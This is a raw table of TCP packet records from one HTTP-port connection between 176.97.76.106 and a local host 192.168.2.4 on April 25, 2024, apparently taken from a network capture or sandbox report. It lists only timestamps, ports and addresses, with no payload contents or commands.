Apr 25, 2024 09:04:02.034090996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034106970 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.034141064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.034153938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034281015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034316063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034351110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.034373999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034396887 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034445047 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034446955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.034487963 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034501076 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034543991 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.034564018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034612894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.034720898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034734011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034744978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034769058 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.034785986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034799099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034832954 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.034832954 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.034868002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034883022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034904957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034919024 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.034941912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.034981012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035001040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035029888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035054922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035067081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035104990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035104990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035126925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035187960 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035201073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035212994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035232067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035265923 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035267115 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035279989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035341978 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035348892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035361052 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035413980 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035423040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035459042 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035475016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035486937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035526991 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035526991 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035550117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035623074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035638094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035650015 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035696983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035698891 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035708904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035733938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035753012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035753012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035764933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035790920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035831928 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035855055 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035887003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035901070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035928965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.035929918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035955906 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.035986900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036001921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036021948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036045074 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.036057949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036087990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.036106110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036124945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036147118 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.036151886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036192894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036232948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036250114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.036284924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036286116 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.036297083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036349058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036385059 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036397934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036416054 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.036416054 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.036447048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036487103 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.036498070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036509991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036521912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036546946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036573887 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.036586046 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.036633968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036647081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036695004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036708117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036745071 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.036772966 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.036786079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036849976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036895990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.036917925 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.036977053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037020922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037034988 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.037070990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037122965 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.037125111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037194967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037237883 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037296057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037307978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037324905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.037343025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037365913 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.037369967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037379980 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.037415981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037456036 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037467957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037509918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.037585020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037599087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037611008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037635088 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.037659883 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.037669897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037708044 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.037715912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037786961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037841082 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037841082 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.037914991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.037954092 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.037988901 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038001060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038060904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038077116 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.038085938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038127899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038158894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.038497925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038511038 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038522005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038536072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038552046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038566113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038569927 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.038569927 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.038582087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038599014 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.038635969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038649082 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.038650990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038666010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038677931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038685083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.038690090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038702011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038712978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038727045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038738012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038738012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.038738012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.038764954 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.038867950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038881063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038889885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038928986 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.038932085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038942099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038948059 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.038950920 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.039005995 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.039123058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039134026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039144039 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039154053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039165020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039175034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039180040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.039180040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.039186954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039196968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039208889 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.039237976 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.039256096 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039298058 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.039326906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039381981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039411068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039463043 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.039478064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039560080 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.039911985 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039932966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039943933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039953947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039964914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039977074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039985895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.039990902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.039990902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.039995909 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040009975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040019035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040019035 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040030003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040031910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040040016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040050030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040056944 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040060043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040070057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040282965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040296078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040307999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040318966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040329933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040342093 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040366888 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040376902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040376902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040376902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040376902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040376902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040399075 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040401936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040425062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040465117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040501118 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040544033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040555000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040577888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040585041 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040641069 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040647030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040659904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040671110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040694952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040745020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040756941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040801048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040803909 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040816069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040827990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.040857077 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040878057 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.040958881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041028023 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041066885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.041073084 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041095018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041165113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041179895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.041218042 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041249990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041275978 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.041294098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041306019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041347980 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.041388035 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041450977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041452885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.041462898 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041502953 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.041517019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041529894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041562080 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041575909 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.041596889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041609049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041631937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041656017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.041683912 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.041703939 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041776896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041790009 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041800976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041837931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041857958 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.041862011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041876078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041903973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.041927099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.041953087 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.041984081 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042032957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042076111 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.042079926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042139053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042150021 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042224884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042234898 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.042237997 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042249918 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042263985 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.042283058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042319059 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042332888 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.042349100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042361021 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042390108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042403936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.042403936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.042435884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042475939 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.042480946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042524099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042561054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042572975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042577982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.042584896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042618990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.042623043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042635918 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042670012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.042689085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042735100 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042771101 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.042782068 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042793989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.042829990 CEST	49733	80	192.168.2.4	176.97.76.106
